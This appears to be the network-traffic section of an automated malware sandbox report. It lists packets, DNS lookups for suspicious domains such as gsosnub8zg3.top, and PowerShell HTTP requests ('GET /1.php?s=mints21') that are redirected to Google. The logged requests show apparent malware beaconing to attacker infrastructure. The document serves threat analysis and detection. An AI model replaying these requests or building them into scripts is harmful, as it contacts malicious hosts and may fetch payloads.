                                                                                                                            Dec 17, 2024 16:30:17.401842117 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.407332897 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.407399893 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.414834976 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.414907932 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.420140982 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.420346975 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.425757885 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.425823927 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.432172060 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.432230949 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.437671900 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.437733889 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.443131924 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.443192005 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.450591087 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.450692892 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.555373907 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.555475950 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.560590029 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.560700893 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.560723066 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.560765982 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:17.560844898 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.561070919 CET49744443192.168.2.445.11.180.77
                                                                                                                            Dec 17, 2024 16:30:17.561090946 CET4434974445.11.180.77192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:21.238884926 CET4974880192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:21.238965988 CET4974980192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:21.359252930 CET8049748193.149.129.61192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:21.359272957 CET8049749193.149.129.61192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:21.359349966 CET4974880192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:21.359386921 CET4974980192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:21.372582912 CET4974880192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:21.372993946 CET4974980192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:21.492284060 CET8049748193.149.129.61192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:21.492422104 CET8049749193.149.129.61192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:22.955274105 CET8049748193.149.129.61192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:22.996814966 CET4974880192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:23.003590107 CET8049749193.149.129.61192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:23.043710947 CET4974980192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:23.100402117 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:23.101898909 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:23.220527887 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:23.220640898 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:23.220895052 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:23.221554041 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:23.221633911 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:23.221854925 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:23.340579987 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:23.341356039 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.421638966 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.421664000 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.421679020 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.421729088 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.421793938 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.421809912 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.421824932 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.421840906 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.421869993 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.422122002 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.422180891 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.422204971 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.422219038 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.422239065 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.422261953 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.541524887 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.541645050 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.541711092 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.545744896 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.590574980 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.613627911 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.613703966 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.616309881 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.617705107 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.618978977 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.619033098 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.619082928 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.627305031 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.627368927 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.628599882 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.628698111 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.628750086 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.637007952 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.644262075 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.644287109 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.644449949 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.648339033 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.648411989 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.655427933 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.655504942 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.655561924 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.659549952 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.669023037 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.669059038 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.669183969 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.673077106 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.673157930 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.682440042 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.682629108 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.682694912 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.686674118 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.710438013 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.710645914 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.710743904 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.736920118 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.736999989 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.737097025 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.741122007 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.741205931 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.805866957 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.805941105 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.806041956 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.807925940 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.808017969 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.808074951 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.812680960 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.814740896 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.814815998 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.814896107 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.819185019 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.819318056 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.819372892 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.819504976 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.819557905 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.823961973 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.828324080 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.828432083 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.828511000 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.830612898 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.830741882 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.841974020 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.842186928 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.842387915 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:25.844280005 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.855556965 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.855658054 CET8049751172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:25.855734110 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.053256035 CET4975180192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.053347111 CET4974880192.168.2.4193.149.129.61
                                                                                                                            Dec 17, 2024 16:30:26.082179070 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.082300901 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.082339048 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.082417965 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.082660913 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.082695961 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.082730055 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.082731009 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.082767963 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.082804918 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.082827091 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.082848072 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.083427906 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.083467007 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.083965063 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.202224016 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.202275038 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.202403069 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.274647951 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.325007915 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.344362974 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.344786882 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.347471952 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.348469019 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.350728989 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.350963116 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.351085901 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.358129978 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.359489918 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.364269018 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.364937067 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.365008116 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.368647099 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.389488935 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.389801025 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.389873028 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.393620968 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.395553112 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.423424959 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.423506021 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.424927950 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.427539110 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.428924084 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.428944111 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.428997040 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.437155962 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.438307047 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.438405991 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.439610958 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.440306902 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.446919918 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.462506056 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.462582111 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.462703943 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.467658043 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.472328901 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.488492012 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.488569975 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.488636971 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.493371010 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.543747902 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.571010113 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.571373940 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.571441889 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.574805021 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.609697104 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.609760046 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.610004902 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.610645056 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.610805988 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.610852957 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.614629984 CET8049752172.217.19.228192.168.2.4
                                                                                                                            Dec 17, 2024 16:30:26.614690065 CET4975280192.168.2.4172.217.19.228
                                                                                                                            Dec 17, 2024 16:30:26.614725113 CET8049752172.217.19.228192.168.2.4
Dec 17, 2024 16:30:26.639349937 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.639410019 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.639422894 CET | 49752 | 80 | 192.168.2.4 | 172.217.19.228
Dec 17, 2024 16:30:26.641200066 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.641333103 CET | 49752 | 80 | 192.168.2.4 | 172.217.19.228
Dec 17, 2024 16:30:26.651524067 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.651822090 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.651887894 CET | 49752 | 80 | 192.168.2.4 | 172.217.19.228
Dec 17, 2024 16:30:26.653516054 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.664081097 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.664206028 CET | 49752 | 80 | 192.168.2.4 | 172.217.19.228
Dec 17, 2024 16:30:26.664351940 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.665831089 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.665888071 CET | 49752 | 80 | 192.168.2.4 | 172.217.19.228
Dec 17, 2024 16:30:26.694449902 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.694772959 CET | 80 | 49752 | 172.217.19.228 | 192.168.2.4
Dec 17, 2024 16:30:26.694830894 CET | 49752 | 80 | 192.168.2.4 | 172.217.19.228
Dec 17, 2024 16:30:26.899672031 CET | 49752 | 80 | 192.168.2.4 | 172.217.19.228
Dec 17, 2024 16:30:26.899842024 CET | 49749 | 80 | 192.168.2.4 | 193.149.129.61
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 16:30:02.413388968 CET | 51375 | 53 | 192.168.2.4 | 1.1.1.1
Dec 17, 2024 16:30:03.403203011 CET | 51375 | 53 | 192.168.2.4 | 1.1.1.1
Dec 17, 2024 16:30:03.816036940 CET | 53 | 51375 | 1.1.1.1 | 192.168.2.4
Dec 17, 2024 16:30:03.816080093 CET | 53 | 51375 | 1.1.1.1 | 192.168.2.4
Dec 17, 2024 16:30:20.809909105 CET | 60702 | 53 | 192.168.2.4 | 1.1.1.1
Dec 17, 2024 16:30:21.226844072 CET | 53 | 60702 | 1.1.1.1 | 192.168.2.4
Dec 17, 2024 16:30:22.956856966 CET | 58166 | 53 | 192.168.2.4 | 1.1.1.1
Dec 17, 2024 16:30:23.095576048 CET | 53 | 58166 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 16:30:02.413388968 CET | 192.168.2.4 | 1.1.1.1 | 0x4b9e | Standard query (0) | pko-download.kagyouth.co.ke | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:30:03.403203011 CET | 192.168.2.4 | 1.1.1.1 | 0x4b9e | Standard query (0) | pko-download.kagyouth.co.ke | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:30:20.809909105 CET | 192.168.2.4 | 1.1.1.1 | 0xbe92 | Standard query (0) | gsosnub8zg3.top | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:30:22.956856966 CET | 192.168.2.4 | 1.1.1.1 | 0xfcf6 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 16:30:03.816036940 CET | 1.1.1.1 | 192.168.2.4 | 0x4b9e | No error (0) | pko-download.kagyouth.co.ke |  | 45.11.180.77 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:30:03.816080093 CET | 1.1.1.1 | 192.168.2.4 | 0x4b9e | No error (0) | pko-download.kagyouth.co.ke |  | 45.11.180.77 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:30:21.226844072 CET | 1.1.1.1 | 192.168.2.4 | 0xbe92 | No error (0) | gsosnub8zg3.top |  | 193.149.129.61 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:30:23.095576048 CET | 1.1.1.1 | 192.168.2.4 | 0xfcf6 | No error (0) | www.google.com |  | 172.217.19.228 | A (IP address) | IN (0x0001) | false
                                                                                                                            • pko-download.kagyouth.co.ke
                                                                                                                            • gsosnub8zg3.top
                                                                                                                            • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49748 | 193.149.129.61 | 80 | 2800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 16:30:21.372582912 CET | 175 | OUT | GET /1.php?s=mints21 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: gsosnub8zg3.top
Connection: Keep-Alive
Dec 17, 2024 16:30:22.955274105 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 15:30:22 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49749 | 193.149.129.61 | 80 | 3448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 16:30:21.372993946 CET | 175 | OUT | GET /1.php?s=mints21 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: gsosnub8zg3.top
Connection: Keep-Alive
Dec 17, 2024 16:30:23.003590107 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 15:30:22 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49751 | 172.217.19.228 | 80 | 2800 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 16:30:23.220895052 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive
Dec 17, 2024 16:30:25.421638966 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:30:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-XJ_CfAakCtYFX1Upmfsayg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-W80guZF93e48HCGgSKyEAeCjEuzLYmHdik9fg9qjqfP7q60ZfnTDw; expires=Sun, 15-Jun-2025 15:30:24 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=TsAIgrZ03_MgW-pwIMH_spHIt6oMyeSWM1WCZ9eFUn_trfKXrd0X5Jc_XfYkn6xoHAYHnNJQ66pCnzdBQNaMkKCz1TV1xi3HQ5WMOkLJuFiaLtCkVzUNndUuz1B_88-ddUj__m4rC_t69crDT9tUWMGlUGHoT7YBONA1oI14tkKKkAbWykwmm0bEdNDRGqgzcr5xvfZD; expires=Wed, 18-Jun-2025 15:30:24 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49752 | 172.217.19.228 | 80 | 3448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 16:30:23.221854925 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive
Dec 17, 2024 16:30:26.082179070 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:30:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-40j4yE7fZSNVeecmNN-0tA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-XkC6wI06bu6yIaTIROvYW39kDJYLNRzR5gojyVddluagn81oHSdw; expires=Sun, 15-Jun-2025 15:30:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
